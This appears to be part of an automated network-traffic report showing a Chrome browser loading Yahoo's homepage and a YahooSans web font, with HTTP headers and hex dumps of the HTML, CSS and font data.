                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC5INData Raw: 66 37 37 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: f77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC1300INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 20 69 64 3d 61 74 6f 6d 69 63 20 63 6c 61 73 73 3d 22 6c 74 72 20 66 70 20 20 64 65 73 6b 74 6f 70 20 20 66 70 2d 6e 6f 6e 65 20 62 6b 74 72 6f 63 6b 65 74 5f 47 41 5f 64 65 73 6b 5f 74 65 73 74 2d 33 2d 76 31 2c 73 65 61 6d 6c 65 73 73 20 75 61 2d 63 68 72 6f 6d 65 20 75 61 2d 31 31 37 2e 30 20 69 73 4d 6f 64 65 72 6e 22 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 31 34 33 35 65 65 38 33 31 64 63 63 33 31 35 32 37 34 33 32 34 64 63 39 66 61 36 62 37 37 37 32 63 36 64 61 39 62 39 38 62 66 63 39 38 33 36 33 32 37 63 35 31 61 32 32 36 33 36 32 64 34 36 39 3e 0a 20 20 20 20 20 20 20 20 77 69 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-color-scheme id=atomic class="ltr fp desktop fp-none bktrocket_GA_desk_test-3-v1,seamless ua-chrome ua-117.0 isModern" lang=en-US><head><script nonce=1435ee831dcc315274324dc9fa6b7772c6da9b98bfc9836327c51a226362d469> win
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC1300INData Raw: 20 79 61 68 6f 6f 20 73 65 61 72 63 68 2c 20 79 61 68 6f 6f 20 6d 61 69 6c 2c 20 79 61 68 6f 6f 20 6d 65 73 73 65 6e 67 65 72 2c 20 79 61 68 6f 6f 20 67 61 6d 65 73 2c 20 6e 65 77 73 2c 20 66 69 6e 61 6e 63 65 2c 20 73 70 6f 72 74 2c 20 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 66 62 3a 61 70 70 5f 69 64 20 63 6f 6e 74 65 6e 74 3d 22 34 35 38 35 38 34 32 38 38 32 35 37 32 34 31 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 69 6d 61 67 65 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 73 6f 63 69 61 6c 2f 69 6d 61 67 65 73 2f 79 61 68 6f 6f 5f 64 65 66 61 75 6c 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: yahoo search, yahoo mail, yahoo messenger, yahoo games, news, finance, sport, entertainment"><meta property=fb:app_id content="458584288257241"><meta property=og:image content="https://s.yimg.com/cv/apiv2/social/images/yahoo_default_logo.png"><meta prope
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC1300INData Raw: 72 7a 2f 6c 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 71 75 65 72 79 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 71 75 65 72 79 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 73 65 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rz/l/favicon.ico"><link rel="dns-prefetch" href="//geo.yahoo.com"><link rel="preconnect" href="//geo.yahoo.com"><link rel="dns-prefetch" href="//geo.query.yahoo.com"><link rel="preconnect" href="//geo.query.yahoo.com"><link rel="dns-prefetch" href="//sear
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC59INData Raw: 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 77 2e 79 61 68 6f 6f 2e 63 6f 6d 22 20 68 72 65 66 6c 61 6e 67 3d 22 7a 68 2d 68 61 6e 74 2d 74 77 22 3e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ternate" href="https://tw.yahoo.com" hreflang="zh-hant-tw">
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC6INData Raw: 37 66 66 39 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7ff9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC1300INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 31 34 33 35 65 65 38 33 31 64 63 63 33 31 35 32 37 34 33 32 34 64 63 39 66 61 36 62 37 37 37 32 63 36 64 61 39 62 39 38 62 66 63 39 38 33 36 33 32 37 63 35 31 61 32 32 36 33 36 32 64 34 36 39 22 3e 2f 2a 20 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 61 61 71 2f 73 63 70 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 41 74 6f 6d 69 63 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 66 64 37 35 61 33 65 37 61 38 36 64 35 35 31 30 38 30 35 35 35 66 38 34 62 34 32 64 31 63 34 30 2e 63 73 73 20 2a 2f 20 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 66 73 5c 29 7b 61 6c 69 67 6e 2d 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <style type="text/css" nonce="1435ee831dcc315274324dc9fa6b7772c6da9b98bfc9836327c51a226362d469">/* https://s.yimg.com/aaq/scp/css/commonAtomic.atomic.ltr.fd75a3e7a86d551080555f84b42d1c40.css */ #atomic .Ai\(c\){align-items:center}#atomic .Ai\(fs\){align-i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC1300INData Raw: 72 3a 76 61 72 28 2d 2d 62 6c 75 72 70 6c 65 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 63 5c 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 5c 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 62 63 5c 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 73 5c 28 68 5c 29 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 68 69 64 64 65 6e 7d 23 61 74 6f 6d 69 63 20 2e 42 64 73 5c 28 73 5c 29 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 73 5c 28 73 5c 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r:var(--blurple)}#atomic .Bdendc\(--hulk-pants\){border-right-color:var(--hulk-pants)}#atomic .Bdbc\(--dirty-seagull\){border-bottom-color:var(--dirty-seagull)}#atomic .Bds\(h\){border-style:hidden}#atomic .Bds\(s\){border-style:solid}#atomic .Bdends\(s\)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              36192.168.2.45105487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC574OUTGET /cv/apiv2/ngy-fonts/YahooSans-VF-Web.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC640INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 17qAe7D4rHCPIYMdSreAHsOIcW+X+q+r3Q8DYgL2OC4M1dQtPr23VP8+c8diVhXfSBZfEj3mW7E=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: YZWTBJT5B9KQE81Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 26 Aug 2024 16:29:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 30 Nov 2020 20:20:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "b4df4fce99e5a3c3d1493112a0159071"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 65176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 3725038
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 77 4f 46 32 00 01 00 00 00 00 fe 98 00 11 00 00 00 02 5e d8 00 00 fe 2a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 8c 2f 1b 83 ee 0a 1c 92 7a 3f 48 56 41 52 8c 77 06 60 3f 53 54 41 54 1c 00 88 00 2f 64 0a 81 b9 10 81 94 4f 0b 87 36 00 30 83 a1 46 01 36 02 24 03 8e 66 04 20 05 8b 7c 07 99 39 5b b3 47 92 80 b0 09 68 2c 6a 2b 6e e3 d7 6d 44 c0 67 6e a9 56 da f1 b3 17 c2 3c bc d6 63 31 3d c5 8c 9a 32 13 7f 7e b0 06 cf 8d e4 ee 76 c4 5e 8d d7 eb b3 ff ff ff ff 17 25 8b 18 5b 33 87 cd ec dd 01 00 a9 66 81 a2 66 f5 fd 3f c9 61 44 2e b9 a8 a8 b6 e8 a8 87 d1 b5 79 18 0b 54 a6 e8 3b 4f d5 73 7e dd 0f 87 b6 d5 f1 f4 86 72 7e 7b c5 bb 3f c6 f1 b0 74 89 76 85 20 ee 44 e2 4b 5f 1b e4 95 c2 74 56 f3 16 de 37 b8 4a c2 86 e3 2d 32 16 3a 46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: wOF2^*/z?HVARw`?STAT/dO60F6$f |9[Gh,j+nmDgnV<c1=2~v^%[3ff?aD.yT;Os~r~{?tv DK_tV7J-2:F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 1f 66 86 85 fb d2 e9 d3 06 b3 8b 33 38 2b db 92 8b 92 5f 4a 39 f6 eb 3f dc 4e ff da 5b 4a 55 fe 43 c9 17 65 85 59 21 0d f6 2c d6 80 ed 97 fb e5 3b d8 4e b3 22 11 49 a7 f9 33 3d 02 5b 40 4d 2c d9 1d 24 2b 5c 85 37 cf a0 53 0f d3 81 05 ae 63 f8 f7 8a 77 2d c0 38 77 06 ba 2c 4a 08 e9 e1 8b 5d 76 a5 4b ec 12 91 74 e5 0f bb 83 1c 22 12 7c bb 44 82 1c de b2 db 8e 25 76 d9 65 97 88 1c 22 22 76 05 11 f1 0f 91 c3 2e bb 24 88 c8 61 97 e4 56 10 11 09 72 88 1c 22 7e 10 f1 03 e0 ef 75 ea fb 92 02 c0 05 1e c6 4e bd 0e 23 8e 38 d6 32 49 b1 d8 10 60 95 6c 16 16 b6 90 ec 84 37 22 ab e5 0d c1 4e 61 ed a4 4e 4b d2 0a d0 dc 27 10 0d 8b bc 65 b2 c4 a7 a7 e9 ff 7f 9b fe fb 67 ef 7d 0e 0f 6a 46 68 0a 11 77 59 69 8a 34 cd 1b 8f df 4a 97 a2 49 19 fe bf e8 02 04 17 c1 a0 97 eb 6b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: f38+_J9?N[JUCeY!,;N"I3=[@M,$+\7Scw-8w,J]vKt"|D%ve""v.$aVr"~uN#82I`l7"NaNK'eg}jFhwYi4JIk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: bf df f5 ee bf 5b bf 0d 5f 9e e3 32 a7 22 8f c9 3e f6 f4 a4 ae 9f e0 33 27 5f 9e e3 bf b1 2c 10 26 93 ff 41 67 a1 23 7b ae 29 1c fd 17 a3 7c 39 aa eb 91 0a ce 30 8f 3d 8d 8d 7e 1c 3a 26 94 4d 3c 4d 14 4e de 68 25 75 3d 15 9e 8a 4c 2f 93 01 98 82 9e 1e 05 ed f8 2f 4b d6 1a 7d 9e df c8 15 ce 84 67 22 33 80 19 e8 d9 53 75 dc bb 13 4f 27 46 7f 62 cc f3 af 7a f8 6a 81 fc c6 5c 75 e6 0a e7 47 41 f7 65 ec 98 9d 88 03 70 a0 9d d1 bb a7 ea 24 d9 c2 bb c2 53 a1 b0 c0 68 d0 e8 0b 63 5e 8c 1f 2d 8a 74 21 bc 50 b8 50 c1 10 46 43 18 0f 3d 55 5d 52 56 92 2d bd 2b 3d 95 c2 a5 48 09 50 82 2e 8d be 2a 92 aa 48 2b ca 2a b2 95 77 95 c2 4a 05 23 18 e7 fe f9 89 f2 bb 24 4c 22 04 40 a0 e9 a8 72 39 fe 75 49 d9 92 ec d2 83 9b 68 69 f4 cb d0 71 9a b5 9f 16 09 a4 e6 a7 0a 0d c6 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: [_2">3'_,&Ag#{)|90=~:&M<MNh%u=L//K}g"3SuO'Fbzj\uGAep$Shc^-t!PPFC=U]RV-+=HP.*H+*wJ#$L"@r9uIhiq0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 02 21 b1 34 4c 36 62 59 b4 32 36 16 ab 50 4a c1 08 50 2e fd 6d 41 ae c7 77 3c cf b4 9a 93 b7 4e 31 f9 eb b5 ac 60 a3 96 17 63 bd 95 ed b6 4f 6a fb 05 7a 19 0f 62 94 6b 83 d8 9a 6d d3 d6 ad 82 83 db ff 3d 8e ee 74 50 27 0f 38 aa 87 6f b4 bb c5 de a8 bb 36 8a 5d 0b 2c 3f 65 ef 6d be 7a 83 d9 e5 6f 36 fa c0 09 42 2b cd ea 09 f3 e3 22 ac 7f 7e 68 dc e0 b1 9f 28 bd 36 2c 1e 4f 6a 1e 74 77 36 ff fa 0e 88 45 bb 2e d2 89 7e 77 97 8c 62 c4 7f 07 22 7e 34 2c bf cd 89 ec bf 7f cd 25 9e 6b ad b6 98 f4 c5 2b 82 33 36 5f 9d cf 3f ee 7e e3 41 2b e2 99 1a 5c 7f 5c 12 3f ad 1d 60 c5 d6 86 43 cb 71 52 7e bb 13 21 b0 b3 d2 18 62 d7 e8 c8 e9 d9 3d 75 18 bd cf d1 f4 2e 5c 41 8e a6 23 0d 4c 50 94 a8 28 bf 14 59 dc e9 b1 5f 39 7a 23 16 e4 e8 48 09 99 b3 4c cb 72 5e 40 61 60 d4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !4L6bY26PJP.mAw<N1`cOjzbkm=tP'8o6],?emzo6B+"~h(6,Ojtw6E.~wb"~4,%k+36_?~A+\\?`CqR~!b=u.\A#LP(Y_9z#HLr^@a`
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: c4 29 74 7c 37 93 7e fd 14 7a 2e 2f e6 d6 f7 81 ff 47 85 65 a4 39 53 fe 27 d1 9f 69 9b 76 48 22 99 94 46 53 17 34 63 37 62 a9 d9 d5 69 4f 7b a2 b7 be 58 3f c8 16 a7 22 ed e7 18 7d 05 90 9f 3c 07 aa 4f 15 9f ba b2 7c fb ff 72 06 25 7a df 73 1e 96 0c 2e 80 de fc ed a2 8d 8c 5c 5a bf 0c 7c 0d 61 2d 9a 35 0e e9 3a 89 75 4f 88 e0 6b 01 21 fa 6b eb a1 f0 63 54 5e f4 5b 0f e7 03 0f 7c 7d ec 81 af 7f 27 57 c3 3b bb 20 3c 0a 61 42 3e ac 8c 09 f4 66 ba b3 c0 97 7c ce b7 8b 2e 80 bd d9 cd 45 a0 74 f1 a5 03 9f 33 5c 05 b3 94 2a 76 5b 81 af d3 4b ef 6a 8d e8 ae 4f e4 48 08 74 52 03 5f 5a c9 55 f5 f9 1b 14 f0 75 81 98 9a 67 97 41 02 44 79 b8 c5 56 0c 93 3e 90 45 f9 b8 a7 cc 51 85 5f ea ec 9b 92 f9 17 bc 95 e1 60 36 2d c7 c7 dd 70 b9 8a 39 6b b8 7c fe 5b fc 44 bf aa 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: )t|7~z./Ge9S'ivH"FS4c7biO{X?"}<O|r%zs.\Z|a-5:uOk!kcT^[|}'W; <aB>f|.Et3\*v[KjOHtR_ZUugADyV>EQ_`6-p9k|[D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: ca 94 8a e9 94 f3 20 ae 0a c9 20 c8 0e 0d 79 c9 1e 26 6b db af 0b 92 0e a0 a8 83 1d ed c8 d2 45 27 24 a2 16 ce 32 9c cd 5c 66 44 2d e6 b0 13 33 d9 8f 85 3f 4e 63 44 14 7d f8 cc 70 3b 55 2c 19 a3 fd a9 5b 4e f7 8f ae 5f ad 43 2e 72 43 43 ae 73 53 01 77 b9 a5 0b 1e 73 fb 62 66 9c 1b c6 2a ea 64 82 20 af 94 f0 9e b7 ca 44 25 ef 82 de d3 87 e3 1f 35 e2 2b 56 fb db fe a5 55 96 ff 68 a7 f9 1f bb e4 1e 37 c4 00 a2 84 19 1d 77 a2 d1 50 dc de 79 c3 f1 a2 a8 49 fc b3 28 23 79 fa 0d 2b 76 19 1d b0 12 92 79 2b 17 84 25 46 ad 06 93 6d 02 45 5e bb 85 fb 70 35 fc ad 5b 7f 1f 04 c6 bc 00 07 e1 cd cb f0 19 7a e7 aa 8d e9 e6 35 75 89 d0 c4 35 ee 09 60 63 10 f7 54 29 61 a6 35 0c 19 4a 8c 15 80 f5 d5 50 c3 68 e0 9f 36 ca 37 ca fd f0 a0 19 01 a2 d7 aa 39 0a 77 1a 76 77 0b fc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: y&kE'$2\fD-3?NcD}p;U,[N_C.rCCsSwsbf*d D%5+VUh7wPyI(#y+vy+%FmE^p5[z5u5`cT)a5JPh679wvw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: ea 4d 07 39 67 3d 8e cf 76 48 42 4b 17 15 db f7 16 59 89 67 9c 56 a7 66 da 87 ed 5b 1f 4e 55 23 20 e7 1c ee c4 1b 38 ca a6 62 7e bf 78 c9 15 cb b7 c5 c5 2e 1f b8 5d fa 78 17 50 1d c4 6e ae 67 a6 7e 6a 6d ec f7 60 77 13 40 77 ca e7 6c c7 65 ae 87 c0 bb 1d 5e f8 29 82 b9 fd 53 eb 75 2d 76 69 d9 13 ad 01 b2 73 2f b9 27 20 b6 38 d6 7d 16 22 b6 29 33 6b 9e cc 5e 58 bb db 5b 9c 80 0a 13 49 db 0d 95 de e9 b0 f6 3c b3 db 48 99 b4 58 99 f6 8e 38 f6 0c 0f e1 07 89 49 32 2c 55 75 51 49 a6 26 4b 23 6f a4 20 65 a9 62 77 cb ec 55 60 ba fb 1d 83 74 a4 27 43 80 05 d4 31 28 63 a0 c8 6c 16 d5 ed 34 3b 0d b2 db dd be ee f6 ef b2 26 36 ec ca d3 9d 94 39 ab b7 13 e7 60 b7 9b 53 37 cf ee 65 df 05 56 7b f7 68 c5 40 37 24 d5 6f 5f 82 97 78 37 0c 72 04 06 26 16 92 13 67 2e d8 d5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: M9g=vHBKYgVf[NU# 8b~x.]xPng~jm`w@wle^)Su-vis/' 8}")3k^X[I<HX8I2,UuQI&K#o ebwU`t'C1(cl4;&69`S7eV{h@7$o_x7r&g.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: f6 5a a6 51 16 38 5e 3f a7 d5 08 19 c7 38 6f af e9 33 21 8b 4f 1c 95 d8 8e 7b 43 fd 77 93 f5 db 29 2a 71 da b6 d8 c4 b4 83 d5 f5 2a 9d 6d e5 0c 34 df b2 2a a2 f1 dc aa 8d 6a c6 c7 64 cd 95 36 ce 72 b8 7e c5 26 1b d3 f0 ad a0 e9 46 59 12 2d d0 62 b9 14 78 0d 9a bd 09 ba 0e 2a ee 2d c5 ba e3 61 04 b5 06 dd 5a 37 6a f6 a5 a0 57 51 2b 96 1a 47 37 a6 5e 4b 19 34 9b 26 d3 72 75 fb f4 7a 1c 03 ab 7b 38 ee 74 82 4e 52 e5 e2 2a de eb 60 8c ad 61 ba 39 66 9c 78 88 52 ef b5 89 a0 5e 03 c1 1d 21 b0 7c 91 d6 d3 a1 b3 26 c3 82 15 b0 bb 0c aa 9d ba 18 9b ab cf 5b 00 e7 3c c0 29 71 50 c7 87 ea c3 7d 50 9f c0 af 06 e0 e0 2a c8 7e 87 2a 0d 59 c5 b6 d6 20 90 ce f3 f9 45 91 99 d2 cc 10 39 18 0b 5a 6b a5 71 42 28 9d 02 20 e7 1e 90 f3 d3 4b a4 5d 6b 74 0e dd 36 71 22 88 2b ae
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ZQ8^?8o3!O{Cw)*q*m4*jd6r~&FY-bx*-aZ7jWQ+G7^K4&ruz{8tNR*`a9fxR^!|&[<)qP}P*~*Y E9ZkqB( K]kt6q"+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 3d ce e5 88 64 a4 d2 22 ad da b4 3f 69 51 72 03 5d ec e9 d9 98 23 f7 82 ef b8 68 25 23 41 ee c0 81 ea 61 04 9e 3a 9c 97 28 62 7b 47 7f e7 a5 ca cc 14 25 1b f8 48 b5 c6 c7 52 fc 89 32 cb ba d4 1e 6d 37 ea b8 4d 5a 89 45 d6 28 81 28 f2 73 7b 5d 1b ad 8e bb 15 09 b0 4a 3d ab 16 02 fa 60 1f 3f a8 26 00 03 18 81 33 ca 3c 2f e5 78 75 96 69 0a 92 71 fa b3 6d 3b 71 b6 99 f7 bf 89 d7 d9 79 b9 f2 0c e9 80 c0 10 28 0c 8e 40 4e bb 47 15 f6 f4 d9 9c ba 01 5c f5 a1 6a 3c f3 dc 8b fd 7a f9 99 62 0d e0 fb 5f 6a 6c 9a 34 b3 6c ad aa d2 08 5b 2a 2d 68 d5 a6 bd 76 60 33 05 9d ba d8 d3 53 eb d2 8b 9f 66 5c a4 6f 55 0d 6a e5 43 4b 97 59 fb 81 60 76 69 66 cb d0 5e 9b 13 e6 ca 5d 0f 8a 73 e0 93 2c 04 7b ab 03 99 81 84 52 b3 25 59 0e ad 5a 05 cb 67 5a fa 67 a6 13 48 67 23 d3 08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =d"?iQr]#h%#Aa:(b{G%HR2m7MZE((s{]J=`?&3</xuiqm;qy(@NG\j<zb_jl4l[*-hv`3Sf\oUjCKY`vif^]s,{R%YZgZgHg#
